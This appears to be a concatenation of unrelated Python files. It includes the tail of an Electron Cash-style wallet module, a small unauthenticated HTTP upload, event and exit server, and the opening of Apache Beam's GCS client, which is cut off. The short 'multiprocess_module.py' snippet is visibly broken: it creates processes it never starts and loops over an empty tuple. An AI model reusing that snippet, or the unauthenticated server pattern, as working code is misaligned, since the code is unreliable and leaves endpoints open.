self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
multiprocess_module.py | import tensor
import NN as nn
import multiprocessing
class Process:
def __init__(self, process_num):
self.process_num = process_num
def run(self, iters):
for () in range(self.process_num - 1):
multiprocessing.Process(target=self._run, args=(iters,))
self._run(iters)
def _run(self, iters):
returnValue = 0
for item in iters:
for value in item:
returnValue = value
return returnValue |
http_server.py | __author__ = "mashed-potatoes"
from os import curdir, mkdir, _exit
from os.path import join, isdir
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from pymitter import EventEmitter
from modules.config import HOME_PATH
class StoreHandler(BaseHTTPRequestHandler):
route = "/upload"
emitter = None
debug = False
def accepted(self) -> None:
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"Accepted")
def not_found(self) -> None:
self.send_response(404)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(b"Error 404. Not Found.")
self.wfile.close()
def log_message(self, format, *args) -> None:
if self.debug:
return super().log_message(format, *args)
def do_GET(self) -> None:
url = urlparse(self.path)
if url.path == "/emit" and self.emitter:
qs = parse_qs(url.query)
self.accepted()
def payload():
self.emitter.emit(
qs["event"][0], qs["args"][0] if "args" in qs else None
)
Thread(target=payload).start()
elif url.path == "/exit":
_exit(0xEE)
else:
self.not_found()
def do_POST(self) -> None:
url = urlparse(self.path)
if url.path == self.route:
length = self.headers["Content-Length"]
data = self.rfile.read(int(length))
fn = parse_qs(url.query)["filename"][0]
name = join(
HOME_PATH, "".join([x if x.isalnum() or x == "." else "_" for x in fn])
)
with open(name, "wb") as fh:
fh.write(data)
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
self.wfile.write(b"OK")
else:
self.not_found()
class NetIO:
server = HTTPServer
emitter = None
handler = StoreHandler
def __init__(self, port: int):
self.server = HTTPServer(("", port), self.handler)
if not isdir(HOME_PATH):
mkdir(HOME_PATH)
def set_emitter(self, emitter: EventEmitter) -> None:
self.handler.emitter = emitter
def start(self) -> None:
self.server.serve_forever()
|
gcsio.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
# pytype: skip-file
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
_LOGGER = logging.getLogger(__name__)
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and it's usage after apitools move to using an API
# specific batch endpoint or after Beam gcsio module start using a GCS client
# library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __init__(self, storage_client=None):
if storage_client is None:
storage_client = storage.StorageV1(
credentials=auth.get_service_credentials(),
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(self.client, filename,
buffer_size=read_buffer_size)
return io.BufferedReader(DownloaderStream(downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(UploaderStream(uploader, mode=mode),
buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError: on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
while not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
